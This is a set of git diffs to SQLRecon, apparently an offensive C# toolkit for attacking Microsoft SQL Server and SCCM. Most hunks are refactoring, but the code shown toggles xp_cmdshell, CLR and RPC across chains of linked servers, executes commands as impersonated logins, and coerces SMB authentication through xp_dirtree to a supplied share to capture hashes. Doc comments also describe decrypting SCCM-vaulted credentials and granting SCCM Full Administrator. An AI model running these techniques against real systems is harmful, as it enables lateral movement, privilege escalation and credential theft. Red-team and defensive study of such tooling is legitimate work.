@@ -651,7 +651,7 @@ namespace SQLRecon.Commands
         /// The lcolumns method is used against linked SQL servers to
         /// to list the columns for a table in a database.
         /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.       
+        /// module name that is supplied via command line, to the actual method name.
         /// </summary>
         public static void lcolumns()
         {
@@ -665,7 +665,7 @@ namespace SQLRecon.Commands
                 return;
             }
 
-            _print.Status(string.Format("Displaying columns from '{1}' in '{0}' on {2} via {3}", 
+            _print.Status(string.Format("Displaying columns from '{1}' in '{0}' on {2} via {3}",
                 _arg1, _arg2, _linkedSqlServer, _sqlServer), true);
 
             _query = "use " + _arg1 + ";" +
@@ -724,7 +724,7 @@ namespace SQLRecon.Commands
         {
             _print.Status(string.Format("Disabling OLE Automation Procedures on {0} via {1}",
                 _linkedSqlServer, _sqlServer), true);
-            _config.LinkedModuleToggle(_connection, "OLE Automation Procedures", "0", 
+            _config.LinkedModuleToggle(_connection, "OLE Automation Procedures", "0",
                 _linkedSqlServer, _sqlServer);
         }
 
@@ -796,19 +796,19 @@ namespace SQLRecon.Commands
 
             // Query to fetch detailed linked server information along with login mappings
             _query = @"
-                SELECT 
-                    srv.name AS [Linked Server], 
-                    srv.product, 
-                    srv.provider, 
+                SELECT
+                    srv.name AS [Linked Server],
+                    srv.product,
+                    srv.provider,
                     srv.data_source,
-                    COALESCE(prin.name, ''N/A'') AS [Local Login], 
-                    ll.uses_self_credential AS [Is Self Mapping], 
+                    COALESCE(prin.name, ''N/A'') AS [Local Login],
+                    ll.uses_self_credential AS [Is Self Mapping],
                     ll.remote_name AS [Remote Login]
-                FROM 
+                FROM
                     sys.servers srv
                     LEFT JOIN sys.linked_logins ll ON srv.server_id = ll.server_id
                     LEFT JOIN sys.server_principals prin ON ll.local_principal_id = prin.principal_id
-                WHERE 
+                WHERE
                     srv.is_linked = 1";
 
             string result = _sqlQuery.ExecuteLinkedCustomQuery(_connection, _linkedSqlServer, _query);
@@ -847,7 +847,7 @@ namespace SQLRecon.Commands
         /// The lrows method is used against linked SQL servers to
         /// determine the number of rows in a table.
         /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name. 
+        /// module name that is supplied via command line, to the actual method name.
         /// </summary>
         public static void lrows()
         {
@@ -1072,13 +1072,13 @@ namespace SQLRecon.Commands
         /// The icolumns method is used in conjunction with an account that can be
         /// impersonated to list the columns for a table in a database.
         /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name.       
+        /// module name that is supplied via command line, to the actual method name.
         /// </summary>
         public static void icolumns()
         {
-            _print.Status(string.Format("Displaying columns from '{0}' in '{2}' as '{1}' on {3}", 
+            _print.Status(string.Format("Displaying columns from '{0}' in '{2}' as '{1}' on {3}",
                 _arg2, _impersonate, _arg1, _sqlServer), true);
-                
+
             _query = "use " + _arg1 + ";" +
                 "SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS " +
                 "WHERE TABLE_NAME = '" + _arg2 + "' ORDER BY ORDINAL_POSITION;";
@@ -1109,9 +1109,9 @@ namespace SQLRecon.Commands
         public static void idatabases()
         {
             _print.Status(string.Format("Databases on {0}", _sqlServer), true);
-            
+
             _query = "SELECT dbid, name, crdate, filename FROM master.dbo.sysdatabases;";
-            
+
             Console.WriteLine(_sqlQuery.ExecuteImpersonationCustomQuery(
                 _connection, _impersonate, _query));
         }
@@ -1271,7 +1271,7 @@ namespace SQLRecon.Commands
         /// The irows method is used in conjunction with an account that can be
         /// impersonated to determine the number of rows in a table.
         /// This method needs to be public as reflection is used to match the
-        /// module name that is supplied via command line, to the actual method name. 
+        /// module name that is supplied via command line, to the actual method name.
         /// </summary>
         public static void irows()
         {
@@ -1385,7 +1385,7 @@ namespace SQLRecon.Commands
         /// <summary>
         public static void ixpcmd()
         {
-            _print.Status(string.Format("Executing '{0}' as '{1}' on {2}.", 
+            _print.Status(string.Format("Executing '{0}' as '{1}' on {2}.",
                 _arg1, _impersonate, _sqlServer), true);
             _xpCmdShell.Impersonate(_connection, _arg1, _impersonate);
         }
@@ -1412,7 +1412,7 @@ namespace SQLRecon.Commands
 
         /// <summary>
         /// The ssites method lists all sites stored in the SCCM databases' 'DPInfo' table.
-        /// This can provide additional attack avenues as different sites 
+        /// This can provide additional attack avenues as different sites
         /// This method needs to be public as reflection is used to match the
         /// module name that is supplied via command line, to the actual method name.
         /// </summary>
@@ -1422,7 +1422,7 @@ namespace SQLRecon.Commands
         }
 
         /// <summary>
-        /// The SccmClientLogons method queries the 'Computer_System_DATA' table to 
+        /// The SccmClientLogons method queries the 'Computer_System_DATA' table to
         /// retrieve all associated SCCM clients along with the user that last logged into them.
         /// NOTE: This only updates once a week by default and will not be 100% up to date.
         /// This method needs to be public as reflection is used to match the
@@ -1470,7 +1470,7 @@ namespace SQLRecon.Commands
 
         /// <summary>
         /// The sdecryptcredentials method recovers encrypted credential string
-        /// for accounts vaulted in SCCM and attempts to use the Microsoft Systems Management Server CSP 
+        /// for accounts vaulted in SCCM and attempts to use the Microsoft Systems Management Server CSP
         /// to attempt to decrypt them to plaintext. Uses the logic from @XPN's initial PoC SCCM secret decryption gist:
         /// https://gist.github.com/xpn/5f497d2725a041922c427c3aaa3b37d1
         /// This function must be ran from an SCCM management server in a context
@@ -1486,7 +1486,7 @@ namespace SQLRecon.Commands
         /// <summary>
         /// The AddSCCMAdmin method will elevate the specified account to a 'Full Administrator'
         /// within SCCM. If target user is already an SCCM user, this module will instead add necessary
-        /// privileges to elevate. This module require sysadmin or similar privileges as writing to 
+        /// privileges to elevate. This module require sysadmin or similar privileges as writing to
         /// SCCM database tables is required.
         /// This method needs to be public as reflection is used to match the
         /// module name that is supplied via command line, to the actual method name.
@@ -1498,8 +1498,8 @@ namespace SQLRecon.Commands
 
         /// <summary>
         /// The RemoveSCCMAdmin method removes the privileges of a user by removing a user
-        /// entirely from the SCCM database. Use the arguments provided by output of the 
-        /// AddSCCMAdmin command to run this command. This module require sysadmin or 
+        /// entirely from the SCCM database. Use the arguments provided by output of the
+        /// AddSCCMAdmin command to run this command. This module require sysadmin or
         /// similar privileges as writing to SCCM database tables is required.
         /// This method needs to be public as reflection is used to match the
         /// module name that is supplied via command line, to the actual method name.

--- a/SQLRecon/SQLRecon/commands/ModuleHandler.cs
+++ b/SQLRecon/SQLRecon/commands/ModuleHandler.cs
@@ -764,11 +764,6 @@ namespace SQLRecon.Commands
                                 "WHERE name NOT LIKE '##%' " +
                                 "ORDER BY modify_date DESC;";
 
-            // Context description adjusts based on connection type
-            string contextDescription = _tunnelSqlServer != null && _tunnelSqlServer.Length > 0
-                ? $"{_database} database from tunnel {_tunnelPath}"
-                : $"{_database} database on {_sqlServer}";
-
             // Execute queries based on connection type
             string dbUsers = _tunnelSqlServer != null && _tunnelSqlServer.Length > 0
                 ? _sqlQuery.ExecuteTunnelCustomQuery(_connection, _tunnelSqlServer, dbQuery)
@@ -779,7 +774,7 @@ namespace SQLRecon.Commands
                 : _sqlQuery.ExecuteCustomQuery(_connection, serverQuery);
 
             // Print user details
-            _print.Status($"Users in the {contextDescription}:", true);
+            _print.Success($"Retrieved users on {contextDescription}:", true);
             _print.Nested("Database Principals:\n", true);
             Console.WriteLine(dbUsers);
             _print.Nested("Server Principals:\n", true);

--- a/SQLRecon/SQLRecon/commands/ModuleHandler.cs
+++ b/SQLRecon/SQLRecon/commands/ModuleHandler.cs
@@ -228,6 +228,29 @@ namespace SQLRecon.Commands
         }
 
         /// <summary>
+        /// The enablerpc method is used against the initial SQL server to
+        /// enable 'rpc out' on a specified SQL server.
+        /// This method needs to be public as reflection is used to match the
+        /// module name that is supplied via command line, to the actual method name.
+        /// <summary>
+        public static void enablerpc()
+        {
+
+            _print.Status($"Enabling RPC on {contextDescription}", true);
+
+            // Determine the context and execute the appropriate method
+            if (_tunnelSqlServer != null && _tunnelSqlServer.Length > 0)
+            {
+                _config.TunnelModuleToggle(_connection, "rpc", "true", _tunnelSqlServer, _sqlServer);
+            }
+            else
+            {
+                _config.ModuleToggle(_connection, "rpc", "true", _sqlServer);
+            }
+
+        }
+
+        /// <summary>
         /// The clr method is used against single instances or tunneled SQL servers to
         /// execute custom .NET CLR assemblies.
         /// This method needs to be public as reflection is used to match the

--- a/SQLRecon/SQLRecon/commands/ModuleHandler.cs
+++ b/SQLRecon/SQLRecon/commands/ModuleHandler.cs
@@ -1,9 +1,7 @@
 ﻿using System;
-using System.Collections.Generic;
 using System.Data.SqlClient;
 using System.Linq;
 using System.Reflection;
-using System.Text;
 using SQLRecon.Modules;
 using SQLRecon.Utilities;
 

--- a/SQLRecon/SQLRecon/commands/ModuleHandler.cs
+++ b/SQLRecon/SQLRecon/commands/ModuleHandler.cs
@@ -34,10 +34,21 @@ namespace SQLRecon.Commands
         private static readonly string _sqlServer = _gV.SqlServer;
         private static readonly string _impersonate = _gV.Impersonate;
 
-        private static readonly string contextDescription = _tunnelSqlServer != null && _tunnelSqlServer.Length > 0 ? $"{_sqlServer} via linked servers {string.Join(" -> ", _tunnelSqlServer)}" :
-                                        $"{_sqlServer}";
-
         private static string _query;
+
+        private static string GetContextDescription()
+        {
+            // Check if there is a tunnel and display the last server in the chain
+            if (_tunnelSqlServer != null && _tunnelSqlServer.Length > 0)
+            {
+                string lastServer = _tunnelSqlServer.LastOrDefault();
+                return $"{lastServer} (via linked servers {string.Join(" -> ", _tunnelSqlServer)})";
+            }
+            return _sqlServer; // If no tunnel, display the primary server
+        }
+
+        // Set the context description
+        private static readonly string contextDescription = GetContextDescription();
 
         /// <summary>
         /// The ExecuteModule method will match the user supplied module in the

--- a/SQLRecon/SQLRecon/commands/ModuleHandler.cs
+++ b/SQLRecon/SQLRecon/commands/ModuleHandler.cs
@@ -28,13 +28,13 @@ namespace SQLRecon.Commands
         private static readonly string _arg1 = _gV.Arg1;
         private static readonly string _arg2 = _gV.Arg2;
         private static readonly string _database = _gV.Database;
-        private static readonly string[] _tunnelSqlServer = _gV.TunnelSqlServer;
+        private static readonly string[] _tunnelSqlServer = _gV.LinkChain;
         private static readonly string _tunnelPath = _gV.TunnelPath;
         private static readonly string _module = _gV.Module;
         private static readonly string _sqlServer = _gV.SqlServer;
         private static readonly string _impersonate = _gV.Impersonate;
 
-        private static readonly string contextDescription = _tunnelSqlServer != null && _tunnelSqlServer.Length > 0 ? $"{_sqlServer} via tunnel {string.Join(" -> ", _tunnelSqlServer)}" :
+        private static readonly string contextDescription = _tunnelSqlServer != null && _tunnelSqlServer.Length > 0 ? $"{_sqlServer} via linked servers {string.Join(" -> ", _tunnelSqlServer)}" :
                                         $"{_sqlServer}";
 
         private static string _query;

--- a/SQLRecon/SQLRecon/modules/ADSI.cs
+++ b/SQLRecon/SQLRecon/modules/ADSI.cs
@@ -225,7 +225,7 @@ namespace SQLRecon.Modules
 
             if (!sqlOutput.Contains("1"))
             {
-                _print.Error("You need to enable CLR (lenableclr).", true);
+                _print.Error("You need to enable CLR (enableclr).", true);
                 // Go no futher.
                 return;
             }

--- a/SQLRecon/SQLRecon/modules/CLRAssemblies.cs
+++ b/SQLRecon/SQLRecon/modules/CLRAssemblies.cs
@@ -34,6 +34,8 @@ namespace SQLRecon.Modules
                 return;
             }
 
+            _print.Status("CLR is correctly enabled", true);
+
             // Get the SHA-512 hash for the DLL and convert the DLL to bytes
             string[] dllArr = _convertDLLToSQLBytes(dll);
             string dllHash = dllArr[0];
@@ -55,7 +57,7 @@ namespace SQLRecon.Modules
 
             if (sqlOutput.Contains("System.Byte[]"))
             {
-                _print.Status("Hash already exists in sys.trusted_assemblies. Deleting it before moving forward.", true);
+                _print.Warning("Hash already exists in sys.trusted_assemblies. Deleting it before moving forward.", true);
                 _sqlQuery.ExecuteQuery(con, "EXEC sp_drop_trusted_assembly 0x" + dllHash + ";");
             }
 
@@ -167,18 +169,23 @@ namespace SQLRecon.Modules
             {
                 _print.Error(string.Format("You need to enable RPC for {1} on {0} (enablerpc -o {1}).",
                     sqlServer, linkedSqlServer), true);
-                // Go no futher.
                 return;
             }
 
+            _print.Status($"RPC is correctly enabled for {sqlServer} on {linkedSqlServer}", true);
+
             // Then check to see if clr integration is enabled.
             sqlOutput = _config.LinkedModuleStatus(con, "clr enabled", linkedSqlServer);
+
             if (!sqlOutput.Contains("1"))
             {
                 _print.Error("You need to enable CLR (lenableclr).", true);
                 // Go no futher.
                 return;
             }
+
+            _print.Status($"CLR is correctly enabled on {linkedSqlServer}", true);
+
 
             // Get the SHA-512 hash for the DLL and convert the DLL to bytes.
             string[] dllArr = _convertDLLToSQLBytes(dll);
@@ -202,7 +209,7 @@ namespace SQLRecon.Modules
 
             if (sqlOutput.Contains("System.Byte[]"))
             {
-                _print.Status("Hash already exists in sys.trusted_assemblies. Deleting it before moving forward.", true);
+                _print.Warning("Hash already exists in sys.trusted_assemblies. Deleting it before moving forward.", true);
                 _sqlQuery.ExecuteTunnelCustomQueryRpcExec(con, linkedSqlServer,
                     "EXEC sp_drop_trusted_assembly 0x" + dllHash + ";");
             }

--- a/SQLRecon/SQLRecon/modules/CaptureHash.cs
+++ b/SQLRecon/SQLRecon/modules/CaptureHash.cs
@@ -15,17 +15,13 @@ namespace SQLRecon.Modules
         /// <param name="tunnelSqlServers">A list of SQL Servers forming the tunnel path, if specified</param>
         public CaptureHash(SqlConnection con, string smbShare, string[] tunnelSqlServers = null)
         {
+            string query = $"EXEC master..xp_dirtree '{smbShare}';";
             if (tunnelSqlServers != null && tunnelSqlServers.Length > 0)
             {
-                // Construct the query to send the SMB request through the tunnel
-                string query = $"EXEC master..xp_dirtree '\\\\{smbShare}\\share'";
-                string result = _sqlQuery.ExecuteTunnelCustomQuery(con, tunnelSqlServers, query);
+                string result = _sqlQuery.ExecuteTunnelCustomQuery(con, tunnelSqlServers, $"SELECT 1; {query}");
+                return ;
             }
-            else
-            {
-                // Directly send the SMB request
-                _sqlQuery.ExecuteCustomQuery(con, $"EXEC master..xp_dirtree '\\\\{smbShare}\\share';");
-            }
+            _sqlQuery.ExecuteCustomQuery(con, $"EXEC master..xp_dirtree '{smbShare}';");
         }
     }
 }

--- a/SQLRecon/SQLRecon/modules/ConfigureOptions.cs
+++ b/SQLRecon/SQLRecon/modules/ConfigureOptions.cs
@@ -1,5 +1,6 @@
 ﻿using System;
 using System.Data.SqlClient;
+using System.Linq;
 using SQLRecon.Utilities;
 
 namespace SQLRecon.Modules
@@ -25,7 +26,7 @@ namespace SQLRecon.Modules
             {
                 if (module.Equals("rpc"))
                 {
-                    // Obtain all SQL server names where RPC is enabled. 
+                    // Obtain all SQL server names where RPC is enabled.
                     // Returns 1 for enabled if the supplied sqlServer exists.
                     // Returns 0 for disabled if the supplied sqlServer does not exist.
                     string result = _sqlQuery.ExecuteCustomQuery(con,
@@ -47,10 +48,10 @@ namespace SQLRecon.Modules
             {
                 if (module.Equals("rpc"))
                 {
-                    // Obtain all SQL server names where RPC is enabled. 
+                    // Obtain all SQL server names where RPC is enabled.
                     // Returns 1 for enabled if the supplied sqlServer exists.
                     // Returns 0 for disabled if the supplied sqlServer does not exist.
-                    string result = _sqlQuery.ExecuteImpersonationCustomQuery(con, impersonate,
+                    string result = _sqlQuery.ExecuteCustomQuery(con,
                     "SELECT is_rpc_out_enabled FROM sys.servers WHERE lower(name) like '%" + sqlServer.ToLower() + "%';");
 
                     return (result.Contains("True"))
@@ -61,7 +62,7 @@ namespace SQLRecon.Modules
                 {
                     // Simple check to see if the supplied module (clr, ole, xp_cmdshell)
                     // is either a 1 (enabled) or 0 (disabled). Return the value.
-                    return _sqlQuery.ExecuteImpersonationQuery(con, impersonate,
+                    return _sqlQuery.ExecuteQuery(con,
                     "SELECT value FROM sys.configurations WHERE name = '" + module + "';");
                 }
             }
@@ -80,27 +81,26 @@ namespace SQLRecon.Modules
         {
                 // Simple check to see if the supplied module (clr, ole, xp_cmdshell)
                 // is either a 1 (enabled) or 0 (disabled). Return the value.
-                return _sqlQuery.ExecuteLinkedQuery(con, linkedSqlServer,
+                return _sqlQuery.ExecuteTunnelQuery(con, linkedSqlServer,
                 "SELECT value FROM sys.configurations WHERE name = ''" + module + "'';");
         }
 
         /// <summary>
-        /// The ModuleToggle method will enable advanced options, then 
+        /// The ModuleToggle method will enable advanced options, then
         /// enable modules via sp_configure. Logic exists for impersonation. Logic exists for rpc.
         /// </summary>
         /// <param name="con"></param>
-        /// <param name="module">Common modules include: clr enabled, 
+        /// <param name="module">Common modules include: clr enabled,
         /// ole automation procedures, and xp_cmdshell. Special logic has been included for rpc.</param>
         /// <param name="value">Enable (1) or disable (0).</param>
         /// <param name="sqlServer"></param>
         /// <param name="impersonate"></param>
-        /// 
         public void ModuleToggle(SqlConnection con, string module, string value, string sqlServer, string impersonate = "null")
         {
-            string sqlOutput;
-
-            if (impersonate.Equals("null"))
+            try
             {
+                string sqlOutput;
+
                 if (module.Equals("rpc"))
                 {
                     _sqlQuery.ExecuteCustomQuery(con, "EXEC sp_serveroption '" + sqlServer + "', 'rpc out', '" + value + "';");
@@ -113,107 +113,116 @@ namespace SQLRecon.Modules
 
                     sqlOutput = ModuleStatus(con, module, "null", sqlServer);
                     _printModuleStatus(sqlOutput, module, value, sqlServer);
-                    
+
                     sqlOutput = _moduleStatus(con, module, "null", sqlServer);
-                    if (!sqlOutput.ToLower().Contains("not have permission"))
+                    if (!sqlOutput.ToLower().Contains("not have permission")){
                         Console.WriteLine(sqlOutput);
+                        return;
+                    }
                 }
                 else
                 {
-                    _sqlQuery.ExecuteQuery(con, "EXEC sp_configure 'show advanced options', 1; " +
-                        "RECONFIGURE; " +
-                        "EXEC sp_configure '" + module + "', " + value + "; " +
-                        "RECONFIGURE;");
+                    _sqlQuery.ExecuteQuery(con, $"EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure '{module}', {value}; RECONFIGURE;");
 
                     sqlOutput = ModuleStatus(con, module);
                     _printModuleStatus(sqlOutput, module, value, sqlServer);
-                    
+
                     sqlOutput = _moduleStatus(con, module, impersonate, sqlServer);
-                    if (!sqlOutput.ToLower().Contains("not have permission"))
+                    if (!sqlOutput.ToLower().Contains("not have permission")){
                         Console.WriteLine(sqlOutput);
+                        return ;
+                    }
+
                 }
+                return;
             }
-            else
+            catch (Exception ex)
             {
-                if (module.Equals("rpc"))
-                {
-                    _sqlQuery.ExecuteImpersonationQuery(con, impersonate,
-                        "EXEC sp_serveroption '" + sqlServer + "', 'rpc out', '" + value + "';");
-
-                    // Convert value from true to 1, and
-                    // from false to 0 for the _moduleStatus method.
-                    value = (value.Equals("true"))
-                        ? "1"
-                        : "0";
-
-                    sqlOutput = ModuleStatus(con, module, impersonate, sqlServer);
-                    _printModuleStatus(sqlOutput, module, value, sqlServer);
-                    
-                    sqlOutput = _moduleStatus(con, module, impersonate, sqlServer);
-                    if (!sqlOutput.ToLower().Contains("not have permission"))
-                        Console.WriteLine(sqlOutput);
-                }
-                else
-                {
-                    _sqlQuery.ExecuteImpersonationQuery(con, impersonate,
-                        "EXEC sp_configure 'show advanced options', 1; " +
-                        "RECONFIGURE; " +
-                        "EXEC sp_configure '" + module + "', " + value + "; " +
-                        "RECONFIGURE;");
-
-                    sqlOutput = ModuleStatus(con, module, impersonate);
-                    _printModuleStatus(sqlOutput, module, value, sqlServer);
-
-                    sqlOutput = _moduleStatus(con, module, impersonate, sqlServer);
-                    if (!sqlOutput.ToLower().Contains("not have permission"))
-                        Console.WriteLine(sqlOutput);
-                }
+                _print.Error($"Error enabling module {module}: {ex.Message}", true);
+                return;
             }
         }
 
         /// <summary>
-        /// The LinkedModuleToggle method will enable advanced options, then 
-        /// enable modules via sp_configure. 
+        /// The LinkedModuleToggle method will enable advanced options, then
+        /// enable modules via sp_configure.
         /// </summary>
         /// <param name="con"></param>
-        /// <param name="module">Common modules include: clr enabled, 
+        /// <param name="module">Common modules include: clr enabled,
         /// ole automation procedures, and xp_cmdshell.</param>
         /// <param name="value">Enable (1) or disable (0).</param>
         /// <param name="linkedSqlServer"></param>
         /// <param name="sqlServer"></param>
         public void LinkedModuleToggle(SqlConnection con, string module, string value, string linkedSqlServer, string sqlServer)
         {
-            // Get a list of linked SQL servers.
-            string sqlOutput = _sqlQuery.ExecuteCustomQuery(con, "SELECT name FROM sys.servers WHERE is_linked = 1;");
-
-            // Check to see if the linked SQL server exists.
-            if (!sqlOutput.ToLower().Contains(linkedSqlServer.ToLower()))
+            try
             {
-                _print.Error(string.Format("Error {0} does not exist.", linkedSqlServer), true);
+                // First check to see if rpc is enabled.
+                string sqlOutput = ModuleStatus(con, "rpc", "null", linkedSqlServer);
+
+                if (!sqlOutput.Contains("1"))
+                {
+                    _print.Error(string.Format("You need to enable RPC for {0} on {1} (enablerpc -o {0}).",
+                        linkedSqlServer, sqlServer), true);
+                    Console.WriteLine(_moduleStatus(con, "rpc", "null", linkedSqlServer));
+                    return;
+                }
+
+                _sqlQuery.ExecuteTunnelCustomQueryRpcExec(con, linkedSqlServer, $"EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure '{module}', {value}; RECONFIGURE;");
+                sqlOutput = LinkedModuleStatus(con, module, linkedSqlServer);
+
+                _printModuleStatus(sqlOutput, module, value, linkedSqlServer);
+
+                sqlOutput = _linkedModuleStatus(con, module, linkedSqlServer);
+                if (!sqlOutput.ToLower().Contains("not have permission"))
+                {
+                    Console.WriteLine(sqlOutput);
+                    return;
+                }
+
                 return;
             }
-
-            // First check to see if rpc is enabled.
-            sqlOutput = ModuleStatus(con, "rpc", "null", linkedSqlServer);
-
-            if (!sqlOutput.Contains("1"))
+            catch (Exception ex)
             {
-                _print.Error(string.Format("You need to enable RPC for {0} on {1} (enablerpc -o {0}).",
-                    linkedSqlServer, sqlServer), true);
-                Console.WriteLine(_moduleStatus(con, "rpc", "null", linkedSqlServer));
-                // Go no futher.
+                _print.Error($"Error enabling module {module} on linked server: {ex.Message}", true);
                 return;
             }
+        }
 
-            _sqlQuery.ExecuteLinkedCustomQueryRpcExec(con, linkedSqlServer, "sp_configure ''show advanced options'', 1; reconfigure;");
-            _sqlQuery.ExecuteLinkedCustomQueryRpcExec(con, linkedSqlServer, "sp_configure ''" + module + "'', " + value + "; reconfigure;");
-            sqlOutput = LinkedModuleStatus(con, module, linkedSqlServer);
+        /// <summary>
+        /// The TunnelModuleToggle method will enable advanced options, then
+        /// enable modules via sp_configure on a chain of linked SQL servers.
+        /// </summary>
+        /// <param name="con"></param>
+        /// <param name="module">Common modules include: clr enabled, ole automation procedures, and xp_cmdshell.</param>
+        /// <param name="value">Enable (1) or disable (0).</param>
+        /// <param name="tunnelSqlServers">An array of server names representing the tunnel path.</param>
+        /// <param name="sqlServer">The initial SQL server.</param>
+        public void TunnelModuleToggle(SqlConnection con, string module, string value, string[] tunnelSqlServers, string sqlServer)
+        {
+            try
+            {
+                // Enable advanced options and the specified module on the last server in the tunnel.
+                _sqlQuery.ExecuteTunnelCustomQueryRpcExec(con, tunnelSqlServers, $"EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure '{module}', {value}; RECONFIGURE;");
 
-            _printModuleStatus(sqlOutput, module, value, linkedSqlServer);
+                string sqlOutput = TunnelModuleStatus(con, module, tunnelSqlServers);
 
-            sqlOutput = _linkedModuleStatus(con, module, linkedSqlServer);
-            if (!sqlOutput.ToLower().Contains("not have permission"))
-                Console.WriteLine(sqlOutput);
+                _printModuleStatus(sqlOutput, module, value, tunnelSqlServers.Last());
+
+                sqlOutput = TunnelModuleStatus(con, module, tunnelSqlServers);
+                if (!sqlOutput.ToLower().Contains("not have permission"))
+                {
+                    Console.WriteLine(sqlOutput);
+                    return;
+                }
+
+                return;
+            }
+            catch (Exception ex)
+            {
+                _print.Error($"Error enabling module {module} on tunnel: {ex.Message}", true);
+                return;
+            }
         }
 
         /// <summary>
@@ -249,17 +258,17 @@ namespace SQLRecon.Modules
             {
                 if (module.Equals("rpc"))
                 {
-                    // Obtain all SQL server names where RPC is enabled. 
+                    // Obtain all SQL server names where RPC is enabled.
                     // Returns 1 for enabled if the supplied sqlServer exists.
                     // Returns 0 for disabled if the supplied sqlServer does not exist.
-                    return _sqlQuery.ExecuteImpersonationCustomQuery(con, impersonate,
+                    return _sqlQuery.ExecuteCustomQuery(con,
                     "SELECT name, is_rpc_out_enabled FROM sys.servers WHERE lower(name) like '%" + sqlServer.ToLower() + "%';");
                 }
                 else
                 {
                     // Simple check to see if the supplied module (clr, ole, xp_cmdshell)
                     // is either a 1 (enabled) or 2 (disabled). Return the value.
-                    return _sqlQuery.ExecuteImpersonationCustomQuery(con, impersonate,
+                    return _sqlQuery.ExecuteCustomQuery(con,
                     "SELECT name, value FROM sys.configurations WHERE name = '" + module + "';");
                 }
             }
@@ -278,8 +287,25 @@ namespace SQLRecon.Modules
         {
             // Simple check to see if the supplied module (clr, ole, xp_cmdshell)
             // is either a 1 (enabled) or 2 (disabled). Return the name and value.
-            return _sqlQuery.ExecuteLinkedCustomQuery(con, linkedSqlServer,
+            return _sqlQuery.ExecuteTunnelCustomQuery(con, linkedSqlServer,
             "SELECT name, value FROM sys.configurations WHERE name = ''" + module + "'';");
+        }
+
+
+        /// <summary>
+        /// The TunnelModuleStatus method checks if advanced options are enabled
+        /// for modules via sp_configure on a chain of linked SQL servers.
+        /// </summary>
+        /// <param name="con"></param>
+        /// <param name="module"></param>
+        /// <param name="tunnelSqlServers"></param>
+        /// <returns></returns>
+        public string TunnelModuleStatus(SqlConnection con, string module, string[] tunnelSqlServers)
+        {
+            // Simple check to see if the supplied module (clr, ole, xp_cmdshell)
+            // is either a 1 (enabled) or 2 (disabled). Return the name and value.
+            return _sqlQuery.ExecuteTunnelCustomQuery(con, tunnelSqlServers,
+            $"SELECT name, value FROM sys.configurations WHERE name = '{module}';");
         }
 
 
@@ -289,7 +315,7 @@ namespace SQLRecon.Modules
         /// </summary>
         /// <param name="sqlOutput"></param>
         /// <param name="value">Enable (1) or disable (0).</param>
-        /// <param name="module">Common modules include: clr enabled, 
+        /// <param name="module">Common modules include: clr enabled,
         /// ole automation procedures, and xp_cmdshell.</param>
         /// <param name="sqlServer"></param>
         private void _printModuleStatus(string sqlOutput, string module, string value, string sqlServer)

--- a/SQLRecon/SQLRecon/modules/ExecuteQuery.cs
+++ b/SQLRecon/SQLRecon/modules/ExecuteQuery.cs
@@ -331,25 +331,22 @@ namespace SQLRecon.Modules
                 // Base case: when there's only one server or none, just return the SQL with appropriately doubled quotes.
                 return sql.Replace("'", new string('\'', (int)Math.Pow(2, ticks)));
             }
-            else
-            {
-                var stringBuilder = new StringBuilder();
-                stringBuilder.Append("select * from openquery(\"");
-                stringBuilder.Append(path[1]);  // Taking the next server in the path.
-                stringBuilder.Append("\", ");
-                stringBuilder.Append(new string('\'', (int)Math.Pow(2, ticks)));
 
-                // Recursively build the nested query for the rest of the path.
-                string[] subPath = new string[path.Length - 1];
-                Array.Copy(path, 1, subPath, 0, path.Length - 1);
+            var stringBuilder = new StringBuilder();
+            stringBuilder.Append("select * from openquery(\"");
+            stringBuilder.Append(path[1]);  // Taking the next server in the path.
+            stringBuilder.Append("\", ");
+            stringBuilder.Append(new string('\'', (int)Math.Pow(2, ticks)));
 
-                stringBuilder.Append(GetNestedOpenQueryForLinkedServers(subPath, sql, ticks + 1)); // Recursive call with incremented ticks.
-                stringBuilder.Append(new string('\'', (int)Math.Pow(2, ticks)));
-                stringBuilder.Append(")");
+            // Recursively build the nested query for the rest of the path.
+            string[] subPath = new string[path.Length - 1];
+            Array.Copy(path, 1, subPath, 0, path.Length - 1);
 
-                string result = stringBuilder.ToString();
-                return result;
-            }
+            stringBuilder.Append(GetNestedOpenQueryForLinkedServers(subPath, sql, ticks + 1)); // Recursive call with incremented ticks.
+            stringBuilder.Append(new string('\'', (int)Math.Pow(2, ticks)));
+            stringBuilder.Append(")");
+
+            return stringBuilder.ToString();
         }
 
         /// <summary>

--- a/SQLRecon/SQLRecon/modules/ExecuteQuery.cs
+++ b/SQLRecon/SQLRecon/modules/ExecuteQuery.cs
@@ -1,4 +1,5 @@
 ﻿using System;
+using System.Data.Common;
 using System.Data.SqlClient;
 using SQLRecon.Utilities;
 
@@ -132,78 +133,160 @@ namespace SQLRecon.Modules
             return sqlString;
         }
 
+
+        /// <summary>
+        /// Checks if the current user can impersonate another user in SQL Server.
+        /// This method first determines if the current user has 'sysadmin' privileges.
+        /// If the user is a 'sysadmin', they can impersonate any user, and the method returns true.
+        /// If not a 'sysadmin', the method checks if the current user has the permission
+        /// to impersonate the specified user by checking the 'IMPERSONATE' permissions in SQL Server.
+        /// If a specific user is not provided, the method assumes no impersonation is needed
+        /// and returns true, indicating that the operation can proceed without impersonation.
+        /// </summary>
+        /// <param name="con">The SQL connection to use for executing the check.</param>
+        /// <param name="impersonate">The username of the user to check impersonation permissions for.
+        /// If null or empty, the method returns true, assuming no impersonation is required.</param>
+        /// <returns>True if the current user can impersonate the specified user or is a 'sysadmin',
+        /// false otherwise.</returns>
+        public bool CanImpersonate(SqlConnection con, string impersonate = null)
+        {
+            // Check if the current user is a sysadmin.
+            string sysAdminCheckQuery = "SELECT IS_SRVROLEMEMBER('sysadmin');";
+            SqlCommand sysAdminCommand = new(sysAdminCheckQuery, con);
+
+            object result = sysAdminCommand.ExecuteScalar();
+            bool isAdmin = result != null && result.ToString() == "1";
+
+            // If the user is a sysadmin, return true, as they can impersonate any user.
+            if (isAdmin)
+            {
+                return true;
+            }
+
+            // If impersonation is not needed, just return true (no specific user to impersonate)
+            if (string.IsNullOrEmpty(impersonate))
+            {
+                return true;
+            }
+
+            // Check if the specific user can be impersonated
+            string impersonateQuery = $"SELECT 1 FROM sys.server_permissions a " +
